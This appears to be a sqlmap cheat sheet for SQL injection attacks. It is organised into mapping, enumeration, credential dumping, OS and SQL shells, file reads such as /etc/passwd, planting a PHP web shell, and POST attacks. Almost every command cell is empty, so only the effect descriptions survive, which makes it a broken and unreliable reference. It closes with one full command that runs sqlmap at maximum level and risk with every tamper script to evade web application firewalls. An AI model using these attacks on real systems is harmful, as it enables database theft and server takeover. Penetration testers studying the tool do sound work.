SQLMap#
sqlmap is an open-source penetration testing tool that automates detection and exploitation of SQL injection flaws and taking over database servers. The operator drives it against web apps to enumerate schemas, dump tables, and pivot to OS or DB shells.
Mapping#
Command |
Effect |
|---|---|
|
Simple mapping option. |
|
Use TOR SOCKS5 proxy. |
|
Manually set the return time. |
Enum#
Command |
Effect |
|---|---|
|
List all databases. |
|
List all tables in a database. |
|
List all columns in a table. |
Auth#
Command |
Effect |
|---|---|
|
Use authentication cookie. |
|
Use credentials to dump a database table. |
Dump#
Command |
Effect |
|---|---|
|
Dump only selected columns. |
|
Dump database table content. |
|
Dump all. |
|
Check privileges. |
Shell#
Command |
Effect |
|---|---|
|
SQLMap OS shell. |
|
SQLMap SQL shell. |
Files#
Command |
Effect |
|---|---|
|
Read a file. |
|
Read /etc/passwd. |
|
Write a file. |
|
Drop a PHP web shell. |
POST#
Command |
Effect |
|---|---|
|
Generic POST attack. |
|
POST attack against |
|
Use a saved POST request file. |
Tamper#
Launch all tamper scripts at once.
$ sqlmap -u 'http://www.example.com:80/search.cmd?form_state=1' --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords